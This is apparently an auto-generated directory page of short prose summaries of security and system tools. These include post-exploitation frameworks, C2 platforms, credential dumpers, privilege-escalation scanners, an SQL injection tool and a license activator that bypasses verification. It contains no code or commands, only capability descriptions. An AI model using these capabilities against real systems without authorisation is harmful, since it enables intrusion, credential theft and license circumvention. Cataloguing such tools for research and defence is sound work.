Automated Privilege Escalation Scanners

HEUKMSActivator is a software license management tool designed to automate the registration and validation of product keys for operating systems and productivity software suites. It functions as a system configuration manager, modifying registry settings and service states to align software licensing status with specific deployment requirements. The utility distinguishes itself through low-level system manipulation, including the injection of signed drivers into memory to intercept license verification routines. It employs memory patching to bypass security checks without altering files on disk, utilizes system file hooking to redirect internal function calls, and hosts a virtual server to emulate official activation services. These processes are executed with administrative privileges to modify protected configuration files and generate cryptographically signed tokens. Beyond its core activation functions, the tool provides capabilities for software lifecycle administration and system configuration automation. It includes a defined set of project principles to guide development and maintain operational standards for the codebase.

Empire is a post-exploitation framework and command and control server designed to manage remote access agents. It provides a centralized system for coordinating these agents and executing specialized scripts across target systems. The project functions as a security evasion tool by adapting network communication patterns to bypass firewalls and monitoring tools. It utilizes a multi-language agent runtime and a modular plugin architecture to execute payloads across different operating systems. The framework covers a broad range of operational capabilities, including remote agent orchestration, privilege escalation workflows, and intelligence gathering. It also manages the deployment and lifecycle of remote agents to maintain persistent system control.

This project is a comprehensive cybersecurity tool collection designed to support security research, penetration testing, and vulnerability assessment. It functions as a unified penetration testing suite, providing a centralized environment where professionals can access a wide range of offensive security utilities to identify system weaknesses and study attack vectors. The platform distinguishes itself through a modular architecture that aggregates disparate security scripts into a single, hierarchical command-line interface. It simplifies the management of these utilities by integrating external repositories, allowing users to fetch and organize third-party tools directly into a structured local directory. By utilizing a categorized menu system and shell-based process execution, the suite enables efficient navigation and direct invocation of specialized tools for tasks ranging from forensic analysis and reverse engineering to exploit development. The toolkit covers a broad spectrum of security domains, including web and wireless attack vectors, cloud security, payload creation, and social media analysis. It also incorporates automated environment setup to handle the installation of necessary system packages and language runtimes, ensuring compatibility across its diverse collection of utilities.

This project is a comprehensive, community-sourced knowledge base designed for security professionals and researchers. It functions as a centralized repository of offensive security techniques, providing a structured collection of exploit payloads, attack vectors, and methodologies for conducting vulnerability assessments and penetration testing. The repository distinguishes itself through a cross-platform payload taxonomy that categorizes exploitation methods by vulnerability type and target environment, enabling rapid lookup during security assessments. It maintains high standards of data integrity and collaborative growth by utilizing version-controlled knowledge management and template-driven content generation, ensuring that the research remains current and consistent across a wide range of technical domains. The project covers a broad capability surface, including detailed references for web application security, database injection, insecure deserialization, and AI model security testing. It also aggregates external resources, such as research papers and third-party tools, to provide a holistic view of modern threat analysis and defensive research. The documentation is organized as a hierarchical tree of markdown files, designed for easy navigation and reference during active security engagements.

GTFOBins is a curated knowledge base documenting security-related techniques for Unix-based system binaries. It serves as a reference for offensive security research, detailing how standard, pre-installed system utilities can be repurposed to facilitate privilege escalation, restricted environment escapes, and post-exploitation workflows. The project distinguishes itself by cataloging insecure execution paths and misconfigured permissions inherent in common system tools. By identifying legitimate binary functions that can be leveraged to bypass security controls, the repository provides a structured index for auditing local system security and understanding methods for maintaining control during security assessments. The platform is built as a static site that separates technical content from its visual presentation. It utilizes a standardized data schema to store binary specifications, which are processed through a template-driven build system to generate the final documentation. A pre-computed index enables client-side search functionality, allowing users to filter and locate specific binary techniques directly within the browser without a backend database.

The framework is a comprehensive penetration testing platform designed for the development, testing, and execution of security exploits. It serves as a research toolkit and automated assessment environment, enabling security professionals to identify and validate vulnerabilities within networked systems and infrastructure through repeatable, standardized procedures. The platform distinguishes itself through a modular architecture that supports reflective payload injection, allowing for the execution of code directly in memory without writing to disk. It utilizes an asynchronous event loop to manage high-performance, concurrent network connections and features a transport-agnostic communication layer that abstracts protocols to maintain persistent command and control. Users can extend the core functionality through a plugin system and define complex exploit logic using a domain-specific language. The framework provides robust capabilities for remote payload management, including the configuration of network settings like sleep intervals and timeout thresholds. It maintains state persistence across long-running sessions by storing discovered host information and vulnerability data in a relational database. The software is designed for cross-platform deployment, with installation support available for Linux, macOS, and Windows environments.

PEASS-ng is an automated penetration testing framework designed to identify privilege escalation vectors on local systems. It functions as a security assessment utility that scans environments for misconfigurations, sensitive files, and insecure permissions to uncover paths for unauthorized privilege elevation. The project distinguishes itself through a modular script-based enumeration engine that adapts to the target environment. It utilizes environment-aware capability detection and cross-platform shell abstraction to normalize data collection across diverse operating systems, while operating primarily within volatile memory to minimize its forensic footprint. The framework covers a broad range of post-exploitation assessment tasks, including automated security auditing for both Linux and Windows environments. It employs pattern-matching heuristic analysis to systematically query system configurations and identify security gaps during authorized security assessments.

This project is an automated security testing suite designed to detect and exploit database vulnerabilities. It functions as a command-line utility that streamlines the identification, verification, and exploitation of web application flaws by automating the injection of malicious payloads into input parameters. The tool provides a comprehensive framework for database enumeration, allowing users to extract schema information, user data, and system configurations from identified injection points. What distinguishes this tool is its sophisticated engine for dynamic payload adaptation and heuristic fingerprinting, which adjusts injection techniques in real-time based on server responses. It supports advanced post-exploitation capabilities, including remote command execution on the underlying host operating system and file system access through database-level vulnerabilities. To navigate restricted environments, the software incorporates out-of-band data exfiltration channels and a middleware pipeline for applying user-defined transformations to bypass security filters and web application firewalls. The suite covers a broad range of operational requirements, including stateful session management, anti-CSRF token handling, and extensive request customization. It supports various target specification methods, such as proxy log analysis and remote API management, while offering granular control over scan performance and detection thresholds. The software is distributed as a command-line application, with configuration management supported through external file loading and command-line arguments.

Shizuku is a framework that enables standard mobile applications to interact with restricted system-level interfaces and services. By acting as a bridge between the user space and protected system functions, it allows applications to perform privileged operations that are typically inaccessible due to standard operating system sandbox limitations. The project functions by routing requests through a persistent background service, which facilitates communication with internal system services and remote interfaces. This architecture allows for the execution of system-level tasks and the management of application permissions without requiring full root access on the device. It achieves this by leveraging existing developer debugging interfaces to inject necessary privileges during the initial runtime handshake. The framework provides a comprehensive set of tools for managing system access, including the ability to intercept and redirect calls to internal interfaces and verify the current execution environment. It supports the development of specialized utilities that require elevated capabilities to function, effectively extending the reach of standard applications while maintaining a structured approach to system-level authorization.

This project is a curated knowledge base and technical reference for shell scripting, focused on performing common system tasks using only built-in shell features. It serves as a guide for implementing logic and automation without relying on external binaries or dependencies, ensuring scripts remain portable across standard Unix-like environments. The repository distinguishes itself by emphasizing native shell functions and syntax to minimize process forking and improve execution performance. It provides idiomatic patterns for complex string transformations, pattern matching, and data flow management, allowing developers to replace heavy external utilities with efficient, built-in alternatives. The collection covers a broad range of system administration and automation techniques, including file management, configuration handling, and environment isolation. The documentation is structured as a technical resource for developers seeking to write portable, lightweight scripts that function consistently across different command-line environments.

Nishang is a PowerShell-based offensive security framework designed for red teaming and penetration testing on Windows targets. It functions as a post-exploitation toolkit and payload generator to automate attacks and manage remote targets. The project provides specialized capabilities for bypassing security controls, such as disabling the Antimalware Scan Interface and employing in-memory execution to avoid disk-based detection. It includes a variety of stealthy command and control mechanisms, utilizing non-standard channels like DNS TXT records, ICMP traffic, and webmail for communication and data exfiltration. The framework covers a broad surface of offensive operations, including privilege escalation through token manipulation, credential harvesting from memory and registry hives, and the generation of weaponized documents. It also facilitates lateral movement via network pivoting, man-in-the-middle traffic interception, and the establishment of persistent backdoors. The toolset is implemented primarily in PowerShell.

This project is a comprehensive technical reference and educational resource designed to improve proficiency with command-line interfaces. It functions as a productivity toolkit, providing a structured knowledge base of essential terminal operations, system administration tasks, and high-impact command sequences for daily development workflows. The guide distinguishes itself through its cross-platform approach, offering standardized documentation that maps utility usage across Linux, macOS, and Windows environments. It provides specific guidance for managing native tools and compatibility layers, ensuring a consistent experience regardless of the underlying operating system. By segmenting technical instructions into platform-specific references, the project enables users to navigate unique system behaviors and configurations effectively. Beyond fundamental operations, the resource covers advanced scripting techniques, system debugging, and data processing workflows. It includes curated collections of concise one-liners and lesser-known utilities intended to optimize complex tasks and automate repetitive maintenance. The content is maintained through community-driven curation, utilizing a structured, markdown-based format to ensure the information remains accurate and accessible.

Bloodhound is an Active Directory attack path mapper and security auditor designed to visualize trust relationships and permission chains. It serves as an attack surface management tool that identifies paths to domain administrator and other high-privileged accounts. The project uses a graph database analyzer to map complex identity and access relationships. It quantifies the risk of privilege escalation by identifying misconfigured permissions and trust links within Windows domains. The system provides capabilities for Active Directory security analysis, identity and access auditing, and network attack path visualization to detect potential security vulnerabilities.

Termux is a mobile terminal emulator and Linux environment runtime that provides a full command-line interface directly on Android devices. It functions as a comprehensive platform for executing native binaries and scripts, featuring an integrated package management system that allows users to download, install, and manage open-source software repositories to extend device functionality. The project distinguishes itself by acting as an embedded execution library, enabling third-party applications to integrate terminal and package management capabilities into their own interfaces without requiring custom forks. It achieves this through a modular architecture that executes code as native libraries, effectively bypassing mobile operating system restrictions that typically prevent the execution of arbitrary binaries from application data folders. To maintain security, the system employs process-isolation-based sandboxing and validates canonical paths to prevent unauthorized command injection or shortcut manipulation. Beyond its core terminal capabilities, the project supports advanced automation through an intent-based system that allows external applications to trigger shell commands. It ensures software portability across different device storage configurations by utilizing dynamic environment-variable-based path resolution. The environment also includes built-in diagnostic tools for log-aggregation-based debugging and maintains a structured process for managing security disclosures and vulnerability reporting.

This project is a post-exploitation framework and privilege escalation script suite designed to scan local system configurations for security gaps. It serves as a system enumeration toolset used to identify paths for gaining higher administrative privileges on a target host. The suite incorporates capabilities for security penetration testing and vulnerability assessment reporting. It uses shell-based system enumeration and pattern-based vulnerability matching to detect misconfigurations, while employing heuristic-based permission analysis to evaluate system flags. Findings are gathered through system enumeration analysis and can be exported into structured JSON, HTML, or PDF formats for reporting. The framework utilizes cross-platform scripting logic to maintain consistent scanning logic across different operating systems.

This project serves as a centralized, community-driven repository of technical knowledge and administrative resources. It provides a structured taxonomy that aggregates disparate information into a searchable framework, supporting continuous learning and rapid problem-solving for system administrators and cybersecurity practitioners. By mapping resources across offensive security, infrastructure management, and software development, it offers a unified path for skill acquisition and professional reference. The project is defined by a command-line-first design philosophy, prioritizing terminal-based utilities and scriptable interfaces to facilitate efficient system administration and repeatable security workflows. It distinguishes itself through a platform-agnostic approach, maintaining documentation and operational guides that remain applicable across diverse Unix-like and cloud-based environments. This modular toolchain integration allows users to compose custom environments tailored to specific administrative or security tasks. The repository covers a broad capability surface, including comprehensive toolkits for system auditing, network management, and infrastructure hardening. It provides structured learning paths for cybersecurity skill development, ranging from ethical hacking labs and penetration testing standards to vulnerability assessment and system configuration best practices. The collection also encompasses a wide array of productivity tools, diagnostic utilities, and educational materials designed to streamline routine maintenance and enhance overall security posture.

Mimikatz is a security research suite designed for auditing Windows authentication and managing system security configurations. It provides a comprehensive framework for extracting sensitive credentials, manipulating process privileges, and managing digital identity assets directly from system memory or offline memory dumps. The project distinguishes itself through advanced system-level exploitation techniques, including runtime process injection, API hooking, and the ability to bypass cryptographic export restrictions. It features a specialized toolkit for Kerberos protocol operations, allowing for the inspection, forgery, and injection of authentication tickets to evaluate network identity security. Additionally, it supports the extraction of authentication secrets from the Local Security Authority and the local security account database. Beyond its core auditing capabilities, the suite includes utilities for managing system services, digital certificates, and cryptographic providers. It offers functionality for privilege escalation, user session impersonation, and the synchronization of data from domain controllers. The tool also provides observability features such as session logging, output encoding, and network route monitoring to assist in the analysis of administrative and security-related actions.

This project is a centralized management interface designed for the optimization, configuration, and maintenance of Windows desktop operating systems. It provides a comprehensive suite of tools for system debloating, automated software deployment, and deep-level performance tuning, allowing users to modify low-level settings that are otherwise inaccessible through standard interfaces. The platform distinguishes itself through its ability to create personalized, custom installation images, enabling users to remove unwanted components, bypass hardware checks, and pre-configure system defaults before deployment. It utilizes a declarative preset system that maps user-selected options to specific registry modifications and command sequences, ensuring consistent environments across multiple machines. Furthermore, the tool includes a state-reversion mechanism that tracks applied changes, providing a reliable way to undo specific tweaks and restore the system to a previous configuration state. Beyond core optimization, the project covers a broad range of administrative capabilities, including bulk software installation, network and DNS configuration, and the management of system update behaviors. It also integrates diagnostic utilities for system repair and recovery, helping to resolve common configuration errors, file corruption, and connectivity issues through automated scripts. The utility is built on a foundation of modular PowerShell scripts, providing a centralized command-line interface for orchestrating complex administrative tasks and standardizing system environments.

This project provides a command-line interface for managing the lifecycle of applications from the Apple App Store. It functions as a package manager for macOS, enabling users to search for software, install new applications, and maintain existing installations directly through terminal commands. The tool distinguishes itself by wrapping private system APIs to perform store operations that are typically restricted to the graphical user interface. It integrates with the operating system to handle administrative privilege elevation, allowing for secure, automated modifications to protected application files during installation and update processes. Beyond basic installation, the utility facilitates system maintenance by auditing installed software and comparing local versions against official store metadata. This allows for the identification of outdated applications and the automation of software updates across multiple machines, supporting consistent environment provisioning through scripted workflows.

This project is a post-exploitation framework and command and control platform designed for security research and penetration testing. It functions as a remote access tool consisting of a central command server and encrypted executable payloads that establish reverse shell connections. The system utilizes a web-based dashboard for multi-client administration, allowing for remote host monitoring and direct shell access through an in-browser terminal. It generates cross-platform, encrypted binaries that employ a multi-stage delivery chain and a key exchange mechanism to secure communications. The platform includes capabilities for in-memory module execution to avoid disk artifacts, alongside sandbox and virtual machine detection to evade security software. Its functional surface covers post-exploitation tasks such as remote privilege escalation and data collection through a suite of modules for keystroke capture and network sniffing.